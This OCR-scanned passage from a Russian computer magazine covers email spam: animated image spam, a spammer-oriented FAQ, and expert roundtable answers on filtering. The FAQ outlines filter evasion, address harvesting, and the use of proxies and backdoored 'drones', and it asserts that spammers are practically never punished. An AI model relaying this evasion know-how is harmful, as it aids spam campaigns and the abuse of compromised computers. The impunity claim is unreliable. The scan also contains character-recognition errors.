так как она распознается и автоматически воспро- 
изводится всеми популярными браузерами. Пер- 
вые анимированные рассылки содержали от 2 
до 4 кадров, из которых только один кадр являлся 
значимым, то есть содержал информационную 
составляющую. Именно на этом кадре был воспро- 
изведен текст спамерского предложения. Осталь- 
ные кадры содержали фон или прочие элементы 
рисунка, не несущие смысловой нагрузки. Значи- 
мый кадр демонстрировался пользователю 
до 10 минут (в разных спам-рассылках это время 
существенно варьировалось), а вспомогатель- 
ные — всего десятые доли секунды. Потом изобра- 
жение ротировалось. 

«Изюминка» новой технологии в том, что 
пользователь в большинстве случаев не понимает, 
что перед ним анимация. «Зашумленные» кадры 
демонстрируются десятые доли секунды, и челове- 
ческий глаз просто не успевает их воспринять. Ма- 
ло того, пользователь нередко даже не замечает, 
что вообще имеет дело с графикой. Он видит текст 
и расценивает его как обычный текст. Но програм- 
мы, предназначенные для борьбы со спамом, 
«видят» все кадры анимации, и поскольку они из- 
начально не были рассчитаны на анимированные 
форматы, то у них может не хватить эвристичес- 
кой мощности для классификации сообщения 
как спамерского. Конечно, для мощных совре- 
менных фильтров и такой спам особой проблемы 
не составит. Так анимированный спам появился 
в конце августа, а на текущий момент «Лаборато- 
рия Касперского» уже выпустила обновление, 
в которое вошел новый «графический» модуль, 
способный справляться с анимацией и «зашум- 
ленными» спам-рассылками с графическими 
вложениями. 

Кроме совершенствования формата, спа- 
меры в течение года вели работу над ускорением 
проведения спам-рассылки (новейшие спамерские 
технологии позволяют разослать сотни тысяч сооб- 
щений всего за несколько десятков минут), а также 
осваивали психолингвистические методы воздей- 
ствия на пользователей. Другими словами, спамеры 
начали работать с текстом, успешно применяя при- 
ем маскировки спама под личное сообщение. Поль- 
зователи предполагают, что им в ящик по ошибке 
попало чужое сообщение. Тем самым они не воспри- 
нимают его как рекламу и готовы более доверчиво 
относиться к контенту. Вот пример такой подделки 
под личное сообщение: 
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КАКОЙ ПРОГНОЗ В ЦЕЛОМ 
НА БЛИЖАЙШИЕ 3 ГОДА? 


АННА ВЛАСОВА: Для интернета 3 года — 
это долгий срок. Тут трудно что-то прогнозировать 
детально. Думаю, самое главное — это то, что 
спам никуда не исчезнет. К сожалению. В любом 
случае, пока предпосылок для его исчезновения 
нет. Конечно, что-то будет меняться. Что же каса- 
ется направлений развития спамерских техноло- 
гий, то: 

1 Спамеры будут бороться за увеличение 
скорости отдельной спам-рассылки, а также нара- 
щивать количество экземпляров сообщений в пре- 
делах одной рассылки. 

2 Спам станет более «умным», то есть от- 
дельные сообщения будут варьироваться и, воз- 
можно, так или иначе приспосабливаться под нуж- 
ды и стиль конкретного пользователя. 

з Развитие технологий по-прежнему будет 
носить «циклический» характер, то есть с опреде- 
ленной периодичностью спамеры будут пытаться 
вернуться к хорошо забытому старому. Скорее 
всего, повторятся попытки рассылок «слишком 
хитрого» спама (например, на ярком и пестром фо- 
He, с дублирующимися буквами ит.п.), который не- 
эффективен, так как пользователю сложно его 
воспринимать. 

4 Антиспамеры обладают достаточными ре- 
сурсами, чтобы противостоять спамерам, и будут 
успешно бороться с ними. 

5 Это, в свою очередь, вынудит спамеров ак- 
тивно осваивать новые плацдармы. Например, мо- 
бильную связь. 

в Материальный ущерб от спама будет толь- 
ко расти, в связи с появлением новых плацдармов 
и в связи с ростом интернета в целом и Рунета 
в частности. 

7 Спам будет становиться все более крими- 
нализированным © 
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На вопросы отвечал 


НАСКОЛЬКО ВЫГОДНО 
ЗАНИМАТЬСЯ СПАМОМ? 


Расценки на рассылку очень сильно зави- 
сят как от вида самой рассылки (что рек- 
ламируем: самонаводящийся анальный вибратор 
с дистанционным управлением/ручку с невиди- 
мыми чернилами/прочий ширпотреб или чугун- 
ные трубы), так и от того, кому рассылаем (физи- 
ческие или юридические лица, адреса с CD из 
ближайшего ларька или вручную отсортирован- 
ная коллекция). За рекламу чугунных труб могут 
предложить значительно большие деньги, чем за 
вибратор, потому что отдача от рекламы намного 
выше. Пусть чугунные трубы нужны 0,001% полу- 
чателей, а вибратор — 1%, но вибраторы расхо- 
дятся и так, об их существовании все знают, 
но по предложенному телефону позвонит от силы 
0,0001%. А среди 0,001% нуждающихся в чугун- 
ных трубах отклик может достигнуть 90%, особен- 
но если проводить рассылку с учетом адреса рес- 
пондентов. 

В очень грубом приближении, рассылка по 
1 миллиону адресов стоит порядка 2 тысяч рублей. 
Учитывая бесплатную стоимость исходящего тра- 
фика по большинству тарифов, все эти 2 тысячи 
превращаются в чистую прибыль. 


OO 


Йа sé 
о 


Ace 
rn ok 


МОГУ ЛИ Я ОГРЕСТИ 
ЗА СПАМЕРСТВО? 


Юридически — нет, так как, вне зависи- 
мости от законодательной базы, трудо- 
емкость доказательства вины снижает вероят- 
ность наказания до нуля. Но проблемы будут. IP, 
с которого проводилась рассылка, быстро зане- 
сут в black-nuctbl. И хорошо если один IP, 
а не всю подсеть, в результате чего пострадают 
другие клиенты провайдера. А для удаления се- 
бя из Маск-листов провайдеру необходимо из- 
рядно поднапрячься и даже потратить кое-какое 
количество денег (удаление из некоторых — 
платное), следовательно, после массовой рас- 
сылки следует ждать отключения и «пистона» 
от провайдера. Поэтому спамеры вынуждены 
использовать либо анонимные ргоху-серверы, 
либо «дроны» (компьютеры других пользовате- 
лей с установленным back-door'om). Но находить 
реально работающие анонимные ргоху с каж- 
дым днем становится все труднее и труднее, а 
установка back-door'a уже попадает под статью. 
Но, сказать по правде, спамеры больше боятся 
не закона, а физической расправы или увольне- 
ния с работы (если для рассылки использова- 
лись служебные каналы). 


YO 


ГДЕ ИСКАТЬ ЗАКАЗЧИКОВ 
НА РАССЫЛКУ? 


© В интернете. Спамеры обычно рекламиру- 

ют себя путем спама ;). А поскольку базы 
у них если не общие, то во многом пересекающие- 
ся, они испытывают сильную конкуренцию, вы- 
нуждающую снижать цены. Но здесь возникают 
большие проблемы с оплатой: заказчик не дове- 
рят исполнителю, исполнитель не доверят заказ- 
чику. И ни тот, ни другой не хотят давать никаких 
контактов, боясь «засветиться». Заказчик требует 
доказательств совершения рассылки, исполни- 
тель обещает предоставить ему 109-файлы. Ho за- 
казчик посылает исполнителя обратно, поскольку 
если он не полный лох, то прекрасно понимает, 
что ю9-файлы можно сгенерировать и без всякой 
рассылки. К тому же отправка письма «на дерев- 
ню дедушке» еще не гарантирует, что дедушка во- 
обще получит его. Заказчик предпочитает оплачи- 
вать работу исполнителя только после того, как 
клиенты повалят к нему косяками, но исполнитель 
посылает заказчика, поскольку он тоже не лох и 
работать на таких условиях не собирается. Возни- 
кает тупиковая ситуация. Одна из сторон должна 
рискнуть. С финансовой позиции рискнуть легче 
cnamepy, осуществив первую рассылку задаром 
(ведь при этом он не тратит денег, исходящий тра- 
фик бесплатный), но вовсе не факт, что заказчик 
даже после набега клиентов обратится к нему еще 
раз. Спамеров много, предложения о спаме при- 
ходят регулярно. Так какой смысл платить за рек- 
ламу, если можно получить ее на халяву? 

С другой стороны, заказчику, рекламирую- 
щему какой-либо товар или услугу, все равно при- 
ходится раскрывать себя — на 100% зашифро- 
ваться он не в состоянии (если только он не рекла- 
мирует сайт, живущий за счет показа банеров — 
хрен найдешь, кто им владеет). Зато спамер 
представляет собой чисто виртуальное лицо и, 
взяв деньги за рассылку, может безболезненно 
раствориться. 

К лицам, имеющим доступ к быстрым кана- 
лам, заказчики часто приходят и сами. В этом слу- 
чае исполнитель видит заказчика, заказчик видит 
исполнителя, и они могут легко урегулировать все 
финансовые вопросы. Правда, в этом случае за- 
казчик просто выбрасывает деньги на ветер, так 
как в наше время «лицо с улицы» может разослать 
спам только на адреса типа info @ рога-и-копыта.ги, 
а остальные задавят фильтры. 


ГДЕ БРАТЬ АДРЕСА 
© ДЛЯ РАССЫЛКИ? 
(>) Базу с несколькими десятками миллио- 
нов адресов можно свободно купить 
на СО-диске в любом ларьке, но только больши- 
нство адресов там «битые», а если не «битые», 


то их владельцы уже давно установили кучу 
фильтров и научились удалять спам на автопи- 


лоте. А ведь для спамера важно не только разос- 
лать письма, но и добиться, чтобы реклама была 
прочитана, иначе, не получив отдачи, заказчик 
к нему уже не обратиться. А как показывает 
практика, основной доход приносят именно пос- 
тоянные клиенты. Даже те немногие адреса 
из СО-базы, владельцы которых не сменили сер- 
вер, не установили фильтры и мужественно чи- 
тают каждое свалившееся на них письмо, оказы- 
ваются завалены такой горой макулатуры, среди 
которой одна конкретно взятая рекламная рас- 
сылка становится совершенно незаметной, а, 
следовательно, неэффективной. 

По статистике, на рекламные рассылки «ве- 
дутся» только те, кто решает воспользоваться 
подобными услугами в первый раз (то есть те, 
кто до этого еще не получал спама или получал 
его в незначительных количествах). Поскольку 
посредством спама «честные» товары/услуги 
рекламируются крайне редко, то на последую- 
щие рассылки чего-бы-то-ни-было клюнут только 
совсем доверчивые люди, коих, как ни странно, 
довольно много, но все-таки не настолько много, 
чтобы отдача от спама по CD-6a3am стала эконо- 
мически оправданной. Спамеры, планирующие 
продержаться на рынке больше пары рассылок, 
создают свои собственные базы путем сбора 
почтовых адресов. 


КАК САМОСТОЯТЕЛЬНО СОЗДАТЬ 
© ДЕЙСТВУЮЩУЮ ПОЧТОВУЮ БАЗУ? 
© Имеющиеся способы создания можно раз- 

делить на честные и нечестные. К честным 
относится сканирование форумов и меБ-узлов на 
предмет «добычи» почтовых адресов. Свыше 
90% адресов, оставленных на форумах, принадле- 
жат физическим лицам, что хорошо подходит для 
рекламы анальных расширителей... или удлините- 
лей. Ну, или точной копии часов Пржевальского 
за $100 (при реальной стоимости в 7$). Сканирова- 
ние web-y3n0B приносит большое количество кор- 
поративных адресов, которым чугунные трубы го- 
раздо интереснее анальных авторучек с невиди- 
мым моторчиком. 

Нечестные способы сводятся к созданию 
вирусов и червей, проникающих на компьютер 
жертвы и чаще всего похищающих адресную кни- 
гу. Реже — «вытягивающих» из входящих/отправ- 
ленных все адреса с именами. Имена важны по- 
тому, что позволяют имитировать письма «от дру- 
зей» и обходить фильтры, распознающие спам 
по отсутствию имени в поле «То» (или неправиль- 
ному имени). 

Естественно, для сбора адресов необходимы 
соответствующие программы, которые приходится 
писать либо самостоятельно, либо поручать эту ра- 
боту голодному студенту. Или использовать уже 
готовое ПО, но среди имеющихся в открытом дос- 
тупе утилит ничего реально работающего пока не 
наблюдается. 
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КАКИЕ СУЩЕСТВУЮТ ЗАЩИТЫ 
ОТ СПАМА И КАК ИХ ОБОЙТИ? 


© В первую очередь, это распределенные 
ОАВЕ-базы данных, хранящие 1Р-адреса, 


занесенные в Баск-листы (DRBL — Distributed Real- 
time Blocking List) и обновляемые в реальном вре- 
мени. Использование почтового сервера DRBL-6a3 
(а их используют практически все крупные серве- 
ры) позволяет уменьшить поток спама до 30%, что 
не слишком эффективно. Но со стороны спамера 
все выглядит иначе. При агрессивной рассылке IP- 
адрес спамера оказывается в DRBL-6a3ax в сред- 
нем через 30 минут после ее начала, после чего 
почтовые серверы банят спамера, и рассылка гас- 
нет как бычок в писсуаре. 

Естественно, при работе через разные ПР-ад- 
реса (например, через легион «дронов») рассылка 
длится намного дольше, но все равно задыхается, 
поскольку в игру вступают другие фильтры, рас- 
познающие спам не по адресам отправителя, а по 
его содержимому. Таких фильтров достаточно 
много, и условно они делятся на две категории: 
сигнатурные и эвристические. Эвристические рас- 
познают спам, основываясь на некоторых знаниях 
06 окружающем мире. Такие фильтры можно 
обойти, просто установив их на свой компьютер и 
разобравшись, на что именно они реагируют (при- 
мерно так вирусописатели создают вирусы, не де- 
тектируемые антивирусными эвристиками). Сигна- 
турные фильтры нуждаются в образце спама для 
его подавления. И если рассылается одно и тоже 
письмо, оно попадет в базы сигнатурных фильтров 
так быстро, как только получатели начнут на него 
жаловаться или поступит сигнал с DRBL, то есть 
примерно через те же 30 минут. Для обхода сигна- 
турных фильтров спамеры используют различные 
полиморфные методики, самые совершенные из 
которых «извращаются» над графическим изобра- 
жением. Например, зашумляя его, наклоняя под 
небольшим углом, масштабируя и так далее. Легко 
показать, что распознавание спама в этом случае 
сводится к задаче распознавания образов, кото- 
рая в общем виде не решена и по сей день. Поэто- 
му графическая реклама пробивает даже те 
фильтры, которые специально проектировались 
для борьбы с ней. 


ЧТО НАСЧЕТ ДРУГИХ ВИДОВ СПАМА 
(ФОРУМЫ, БЛОГИ, МЕССЕНДЖЕРЫ) ? 


© На сегодняшний день массовой миграции 
спамеров с электронной почты в сторону 


других средств коммуникации еще не произошло, 
в силу технической сложности подобной миграции. 
Хотя сама тенденция уже налицо, угроза не так уж 
и значительна. Разработчики антиспамовых 
фильтров не сидят сложа руки и работают над соз- 
данием защитных средств, а спамеры, тем време- 
нем, прикидывают, как их обойти. Короче, тради- 
ционное противостояние меча и щита. © 
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модем Russian Courier. проект 3proxy (www.secu- 
Сфера профессиональных —_rity.nnov.ru/soft/3proxy/). 
интересов — безопасность, 
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МАКСИМ ОРЛОВСКИЙ: В принципе, можно победить лишь частично, гипо- 
тетически — можно победить практически полностью... а вот практически — 
скорее всего нельзя. 

МИХАИЛ ФИШМАН: Да, можно. Суть проблемы заключается в том, что спам 
на сегодняшний день — занятие выгодное и прибыльное. Причем прибыль- 
ное не только для спамеров. Уже существует много фирм и корпораций, 
предлагающих анти-спам решения за немаленькие деньги и, само собой ра- 
зумеется, терять свои прибыли эти компании не хотят: не будет спама — 
не будет прибыли. Нельзя забывать и про недобросовестных владельцев 
почтовых серверов, продающих свои таййзГы. Единственное решение этой 
проблемы в том, чтобы спам стал коммерчески невыгоден, в таком случае 
он исчезнет сам собой. В любом другом варианте он останется выгодным, 
как кардинг или фишинг, а значит, преступники (спамеры) будут приходить 
и уходить, а надоедливая реклама продолжит свое существование. 
ВАЛЕРИЯ КОМИССАРОВА: Полностью победить... как-то сомнительно. 
Но свести цифры к разумным пределам — можно. Продуманное сочетание 
различных методов борьбы, каждый из которых отсеивает определенные ис- 
точники нежелательных сообщений. И правовые методы, и фильтрация самы- 
ми разными способами (программными, административными) — помогут об- 
легчить проблему. Но дотех пор, пока спам выгоден кому-то — не будут успеш- 
но развиваться существующие методы борьбы с ним и не будут появляться но- 
вые. Ведь профессиональных спамеров единицы! Все остальные спам-письма 
с примитивными методами обхода фильтра отслеживаются довольно легко. 
АНАТОЛИЙ СКОБЛОВ: Пока сохраняются зомби-сети — нет, техническими 
способами. Но вот сажать их — реально, было бы желание, но сложно. 
ЗАРАЗА: Спам победить нельзя. Хотя бы потому, что каждый по-разному оп- 
ределяет для себя, что это такое. 

АЛЕКСЕЙ ЛУКАЦКИЙ: Как техническую или социальную проблему? Если 
второе, то это нереально, так как всегда найдутся желающие привлечь инте- 
рес к своему продукту в массовом масштабе. Спам — единственный меха- 
низм, который позволяет это сделать при минимальных затратах. С техни- 
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КРИС КАСПЕРСКИ 


Компьютеры грызет еще 
с тех времен, когда 
Правец-8Д считался 
крутой машиной, 

а дисковод с монитором 
были верхом мечтаний. 
Освоил кучу языков и 
операционных систем, из 
которых реально 
использует W2K, алюбит 


FreeBSD 4.5 


ческой точки зрения можно «загнать» проблему в определенные рамки и не дать ей разрастись, как это 
происходит сейчас. Но это потребует целого комплекса мер, которые не всегда реализуемы на уровне 
отдельного пользователя. Гораздо более эффективна защита на уровне оператора связи — так можно 
задушить спам в зародыше. Вот только операторы пока не готовы внедрять такие технические меры. 
КОНСТАНТИН ГАВРИЛЕНКО: Спам — слишком обширное понятие, не ограничивающееся одним 
только «емейлом». Абстрагируясь от общепринятого значения, могу сказать, что меня также спамят 
какие-то типы на улице, раздающие бесполезные буклетики, по телефону, по простой почте, с экра- 
нов телевизоров, с газетных листов, с плакатов и афиш. Это все СПАМ, — та информация, которую 
мы не запрашивали, но которую нам постоянно пытаются «впихнуть». Ни для кого не секрет, что по- 
пулярность рассылок спама через электронную почту вызвана в первую очередь дешевизной. 
И единственный способ победить спам в его настоящей и наиболее надоевшей форме — сделать 
рассылку невыгодной для спамера. Но победим этот вид спама, появится другой. В принципе, про- 
цесс никогда не остановится. 

INSIDEPRO: Можно, но только не на стадии получения спама, a еще на стадии его рассылки. То есть, 
необходим анализ и учет трафика на уровне провайдеров (в том числе магистральных) для выявления 
серверов массовой рассылки сообщений, поиск и нейтрализация ботнетов (контролируемых сетей, сос- 
тоящих из зараженных компьютеров), рассылающих спам, ужесточение законодательства в данной об- 
ласти и т.д. Просто не нужно забывать, что кроме электронной переписки по е-тай, захламленной спа- 
MOM, есть много других способов общения — интернет-пейджеры (ICQ, MSN и другие), личные сообще- 
ния в форумах, приватное общение в блогах, IRC... Так что всегда можно найти способ обмена сообще- 
ниями, не обремененный рекламой. 

АНТОН КАРПОВ: Смотря что считать победой. Если цель — никакой ценой не пропустить спам и толь- 
ко, то, очевидно, она достижима самым тривиальным образом: принимать почту только с доверенных 
серверов из «белого» списка, только от заранее известных доверенных респондентов. Хотят написать 
тебе письмо — предварительно контактируют лично и сообщают свой адрес. Все, спам побежден. 
Но также очевидно, что такая система вряд ли имеет право на существование в силу своей абсолютной 
негибкости. Так что под «победой над спамом» надо понимать такой результат, когда спам если и про- 
ходит, то в таких количествах, которые не раздражают пользователей (это может быть одно письмо 
в день или одно письмо в неделю). Добиться такого результата вполне возможно. 

КРИС КАСПЕРСКИ: Можно, и это совсем не сложно. Достаточно сделать его неэффективным, то есть 
просто перестать обращать на него внимание или бойкотировать фирмы, рекламирующие себя подоб- 
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КАК ТЫ CAM БОРЕШЬСЯ 
С НЕАДРЕСНЫМИ СООБЩЕНИЯМИ? 


ным способом. Но это в теории. На практике, даже удаляя спам на автомате, мы все-таки иногда им 
пользуемся. Даже если один из тысячи хочет удлинить себе то, размер чего не имеет значения, то, при 
стоимости электронной рассылки, рекламодателю это выгодно. Тем не менее, популярность электрон- 
ной почты стремительно падает, и весь цивилизованный мир уже давно подсел Ha yahoo и msn теззеп- 
дегы, так же появилась «личная почта» и «аккаунты» на сайтах. А старое доброе мыло становится в ос- 
новном средством корпоративной переписки, которой реклама продуктов массового потребления неин- 
тересна. А более серьезные товары/услуги и рекламируются серьезнее. 


МАКСИМ ОРЛОВСКИЙ: Используя стандартные средства, встроенные в почтовые системы, в первую 
очередь Google Май. Судя по моим наблюдениям за собственной корреспонденцией, этот сервис обла- 
дает одной из наиболее сильных систем фильтрации спама с чувствительностью до 98% и специфич- 
ностью около 100%. 

МИХАИЛ ФИШМАН: Я никогда не оставляю почтового адреса в интернете. Для регистрации на сайтах 
или форумах у меня есть мыло на дтай, для дел и работы — корпоративная почта. Как результат, 
на дтай валятся тонны спама, которые весьма умело разгребает верный Гугл, а корпоративная почта 
такой проблемой не страдает. Разумеется, совсем не последнюю роль играют Black/White листы, све- 
жие базы антиспам фильтра и грамотный конфиг МТА. 

ВАЛЕРИЯ КОМИССАРОВА: Для меня вариант потери важного письма (к сожалению, до сих пор еще 
очень частый) — абсолютно неприемлем. Одно время я терпела 20-30 нежелательных пи- 
сем (в течение 2-3 часов), но сейчас это стало непереносимым. Поэтому получила дополнительную пробле- 
му — ежедневный просмотр папки «Спам». Неплохо решают проблему «белые списки». Из программ, ко- 
торыми пользуюсь — байесовский фильтр Вага, G-Lock SpamCombat, РорМай. Лучше пока не встречала. 
АНАТОЛИЙ СКОБЛОВ: Вот несколько правил, которые я соблюдаю: 


1 НЕ ПОЛЬЗУЮСЬ БЕСПЛАТНОЙ И ПРОВАЙДЕРСКОЙ ПОЧТОЙ, ВСЯ ПОЧТА ИДЕТ НА СВОИ 
ДОМЕНЫ С ПОЛНЫМ МОИМ КОНТРОЛЕМ НАД НЕЙ. 


2 ИСПОЛЬЗУЮ ФОРВАРД ВСЕЙ ПОЧТЫ ДОМЕНА В 1 ЯЩИК С ДАЛЬНЕЙШЕЙ ОБРАБОТКОЙ 
PROCMAIL'OM И ФИЛЬТРАЦИЕЙ SPAMASSASSIN'OM. 


з СОБЛЮДАЮ «ПОЧТОВУЮ ГИГИЕНУ». НЕ ПУБЛИКУЮ АДРЕСА ДЛЯ ЛИЧНОЙ 

ПОЧТЫ, ПУБЛИЧНЫЕ АДРЕСА НА СВОИХ САЙТАХ — ТОЛЬКО В ЗАЩИЩЕННОЙ 

ОТ СПАМЕРОВ ФОРМЕ (ПОКА ЧТО ОНИ НЕ НАЧАЛИ ОСВ'ИТЬ ГРАФИЧЕСКИЕ ФАЙЛЫ 
ИЛИ ПЫТАТЬСЯ ВЫПОЛНЯТЬ JAVASCRIPT, ФОРМИРУЮЩИЙ СТРАНИЦУ, ТАК ЧТО 

ЭТО ПОМОГАЕТ). В ЛЮБОМ МЕСТЕ, ГДЕ НУЖНО ОСТАВИТЬ E-MAIL НА САЙТЕ, ОСТАВЛЯЮ 
УНИКАЛЬНЫЙ ДЛЯ ЭТОГО МЕСТА АДРЕС, УТЕЧЕТ К СПАМЕРАМ — ОТФИЛЬТРУЮ. 

ДЛЯ АДРЕСОВ, КОТОРЫЕ ТОЧНО ПОПАДУТ К СПАМЕРАМ (НАПРИМЕР, УКАЗАННЫЕ 
ПРИ РЕГИСТРАЦИИ ДОМЕНА), ИСПОЛЬЗУЮ ФИЛЬТРАЦИЮ ПО ОТПРАВИТЕЛЮ, ЧТОБЫ 
100% НЕ ПОТЕРЯТЬ НУЖНОЕ ПИСЬМО, ФИЛЬТРУЯ СПАМ. ЗА 5 ЛЕТ ИЗ ВСЕХ АДРЕСОВ, 
УКАЗАННЫХ НА САЙТАХ, К СПАММЕРАМ ПОПАЛИ 3 — УКАЗАННЫЕ ПРИ РЕГИСТРАЦИИ 
ДИСКОНТНОЙ КАРТЫ НА MNOGO.RU, SIP-AKKAYHTA В КОМПАНИИ TELPHIN 

И ПОКУПКЕ БИЛЕТОВ В КАКОМ-ТО ТУРАГЕНТСТВЕ. К СОЖАЛЕНИЮ, В ПОСЛЕДНЕЕ 
ВРЕМЯ СЛУЧИЛАСЬ БЕДА, О ВОЗМОЖНОСТИ КОТОРОЙ БЫЛО ИЗВЕСТНО ДАВНО — 
ВИРУСЫ СТАЛИ НЕ ТОЛЬКО РАССЫЛАТЬ СЕБЯ ПО АДРЕСНОЙ КНИГЕ, 

НО И ОТСЫЛАТЬ E-MAIL СПАМЕРАМ. ДВА ПОСЛЕДНИХ АДРЕСА ПОПАЛИ К СПАМЕРАМ 
ИМЕННО ТАКИМ ОБРАЗОМ. 


4 ИСПОЛЬЗУЮ SPAMASSASSIN ДЛЯ ФИЛЬТРАЦИИ СПАМА НА ТЕХ АДРЕСАХ, 
КУДА ОН МОЖЕТ ПРИДТИ, И КОТОРЫЕ НЕВОЗМОЖНО ЗАБЛОКИРОВАТЬ. 


ЗАРАЗА: Использую спам-фильтр. К сожалению, без него просто невозможно. Неутешительная статис- 
тика за 19 часов 55 минут, прошедших с начала суток: 263 блокированных письма на личный «реальный» 
ящик, 1652 блокированных письма на мои ящики на Security.nnov.ru (они везде публикуются и хорошо раз- 
рекламированы), 565 писем на корпоративные ящики. Итого: 2480 блокированных спам-писем, а в сутках 
еще осталось 4 с лишним часа. Вряд ли я смог бы все прочитать за день :). Год назад было не более 1500. 
АЛЕКСЕЙ ЛУКАЦКИЙ: Указательным пальцем ;). Глаз уже натренирован, и я сходу могу определить, 
спам мне пришел или нет. Поэтому все затраты связаны с выделением мусора и его удалением из поч- 
тового ящика. Никаких специальных систем (кроме установленных у нас в компании централизованно) 
не использую в виду нежелания заниматься их регулярным обновлением, без которого их эффектив- 
ность стремительно приближается к нулю. 


НАИБОЛЕЕ АКТУАЛЬНАЯ 
ПРОБЛЕМА — ОПРЕДЕЛИТЬ 
ТОНКУЮ ГРАНЬ «СПАМ/НЕ СПАМ». 
КАК ПОКАЗЫВАЕТ ПРАКТИКА, 
ЛИБО СПАМА БОЛЬШЕ, 

ЛИБО ВЕРОЯТНОСТЬ НЕ ПОЛУЧИТЬ 
НУЖНЫЕ ПИСЬМА ВЫШЕ. 

ГДЕ ВЫХОД? 


КОНСТАНТИН ГАВРИЛЕНКО: Прикрутил Спамассассин к почтовому серверу. Но, несмотря на его 
присутствие, спам все равно просачивается — около 1% от общего числа принятых писем. 

INSIDEPRO: Если почтовый адрес используется для приватной переписки, то настраиваю почтовый сер- 
вер так, чтобы все письма, кроме получаемых с определенных адресов, удалялись прямо там. Если же 
почтовые ящики были мной созданы для выполнения каких-либо функций (раскрутка сайта, размещение 
программ на shareware-cepBepax итак далее), то после выполнения своих функций я просто удаляю их :). 
АНТОН КАРПОВ: Не буду утверждать, что мой метод подходит для любого случая и является панаце- 
ей, однако он работает и очень даже эффективно. Связка «Postfix + some headers checks + blacklists + 
SpamAssassin + OpenBSD spamd greylisting» опробована в боях и ни разу не подводила. В экстремаль- 
ном случае можно вообще взять любой почтовый сервер без каких-либо «спамовых докруток» и пос- 
тавить перед ним упомянутый OpenBSD spamd в режиме greylisting. Есть мнение, что по сочетанию 
«простота настройки/получаемый результат» этому программному продукту от разработчиков ОС 
OpenBSD нет равных. 

КРИС КАСПЕРСКИ: Часто меняю адреса, сообщая их ограниченному кругу лиц и используя почту в ос- 
новном для служебной переписки. Никакие дополнительные фильтры не устанавливаю, предпочитая 
удалять все левые сообщения вручную, тем более что их приходит сравнительно немного. 


МАКСИМ ОРЛОВСКИЙ: Наиболее эффективным является применение адаптивных алгоритмов и ней- 
росетевых технологий с возможностью обучения. Многие топовые антиспамовые фильтры на совре- 
менных почтовых серверах используют именно их, благодаря чему в последнее время достигнут боль- 
шой прогресс в защите от спама. 

МИХАИЛ ФИШМАН: Это действительно очень сложная проблема, особенно на почтовых серверах 
крупных корпораций. Пользователи получают критически важные сообщения, которые ни в коем слу- 
чае нельзя потерять в недрах спамфильтров. Обычно в таких сетях удаляют только совсем явный 
спам, а все подозрительные письма доставляют юзеру в отдельную папку вроде Junk Май и пишут 
в должностной инструкции — обязательно проверять письма в Junk перед их удалением. Выход надо 
искать в области попыток снижения количества спама, а никак не в области его фильтрации. Еще один 
вариант — строго-настрого запретить работникам использовать корпоративный ящик для личных це- 
лей и не «светить» его в Сети. 

ВАЛЕРИЯ КОМИССАРОВА: Выход может быть только в постепенном улучшении методов борьбы. 
«Силовой» метод решения проблемы здесь не применим. Только постоянное улучшение, постоянная 
доработка и разработка. Использование «белых» и «черных» списков, применение технологий ИИ 
в фильтрах — все ведет к тому, что ситуация будет улучшаться. Медленно, но верно. 

АНАТОЛИЙ СКОБЛОВ: «Почтовая гигиена» позволяет не фильтровать некоторые ящики, используе- 
мые для важной почты. A SpamAssassin позволяет проверять почту на «спамность» по куче разных 
критериев: Бауез-фильтр, учитывающий частоту появления слов в нормальной почте и спаме, различ- 
ные «черные» списки открытых релеев, открытая БД сигнатур спама razor, проверка различных пара- 
метров заголовков и писем. При этом все критерии имеют различный вес (настраивается), и по сумме 
всего найденного определяется «спамность». 

ЗАРАЗА: Для меня спам — это все, что тебе не нужно, но что пришло в твой ящик. Все, что напрасно от- 
нимает время. Естественно, автоматическая фильтрация спама — зло. И фильтровать почту 
или не фильтровать ее — каждый решает сам. Нужно быть готовым к соответствующим потерям либо 
времени и нервов, либо нужной корреспонденции. 

АЛЕКСЕЙ ЛУКАЦКИЙ: Получать все, а подозрительные письма маркировать пометкой [SPAM]. 
Это позволит складировать вызывающие сомнения сообщения в отдельной папке, которую можно бу- 
дет просматривать раз в день. Перекладывать ответственность по удалению почты на автоматизиро- 
ванную систему я бы не стал. 

КОНСТАНТИН ГАВРИЛЕНКО: Тонкая грань определяется автоматически, с помощью определенной 
системы оценки содержания сообщения, присутствия релеев в «черных» списках, автоматических «бе- 
лых» И «черных» листов отправителей и прочего. Для меня выходом стало автоматическое складирова- 
ние помеченных спам-писем в отдельный смап-фолдер и их хранение в течении недели. Если я ожидаю 
какого-то важного письма и не получаю его, то проверяю спам-фолдер, но это скорее исключение из 
правил, так как такие ситуации достаточно редки. В ту же папку уходят письма, которые не были поме- 
чены как спам, для последующего «натаскивания» статистических фильтров. 

INSIDEPRO: Адреса технической поддержи или отдела продаж какой-либо фирмы однозначно должны 
принимать все 100% сообщений, так как из-за фильтрации можно «недополучить» какую-либо важную 
информацию, в том числе и коммерческого характера. Если же это e-mail обычного пользователя Сети, 
который использует его для переписки с друзьями и получения рассылок, то вариантов два: периоди- 
чески менять свой почтовый адрес, предупреждая об этом своих корреспондентов, либо на своем 
РОРЗ-сервере разрешить прием писем ТОЛЬКО от служб рассылки и от конкретных адресов своих зна- 
комых, уничтожая остальные письма прямо на сервере. 
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СПАМЕРЫ ДОВОЛЬНО ЭФФЕКТИВНО 
АТАКУЮТ ФОРУМЫ И БЛОГИ. 

ЕСТЬ ПРЕДПОСЫЛКИ, ЧТО СКОРО 
СТАНЕТ НЕ ТОЛЬКО СЛОЖНО 
ЧИТАТЬ ПОЧТУ, НО И ОБЩАТЬСЯ 
ЧЕРЕЗ ИНТЕРНЕТ. НЕ ПУГАЕТ ТАКАЯ 
ПЕРСПЕКТИВА? 


АНТОН КАРПОВ: Эта проблема возникает при использовании комплексных анализаторов тела и за- 
головков письма на соответствие определенным критериям, по результатам которых делается вывод 
© «чистоте» корреспонденции. В качестве примера ПО, реализующего такую функциональность, мож- 
но привести тот же SpamAssassin. Действительно, анализ письма может быть эффективным, одна- 
ко он занимает определенное время, и есть возможность как слиберальничать (пропустить спам), так 
и слишком сильно закрутить гайки (не пропустить честное письмо). Самый простой выход — просто 
полагаться на другие методики. Уже упомянутый OpenBSD зрата опирается на совсем иные техноло- 
гии, основа которых — определение спамера не по корреспонденции, а по поведению хоста. На сайте 
http://www.ualberta.ca/~beck/nycbug06/spamd/ приведены слайды с доклада разработчика spamd о технологи- 
ях и методиках, применяемых в этом продукте. 

КРИС КАСПЕРСКИ: Гораздо больше страдаю не от спамеров, а от злобных администраторов, уста- 
навливающих на корпоративных серверах агрессивные фильтры, к тому же очень хреново настро- 
енные. ВЕС настоятельно рекомендует, чтобы сервер в случае недоставки письма посылал отпра- 
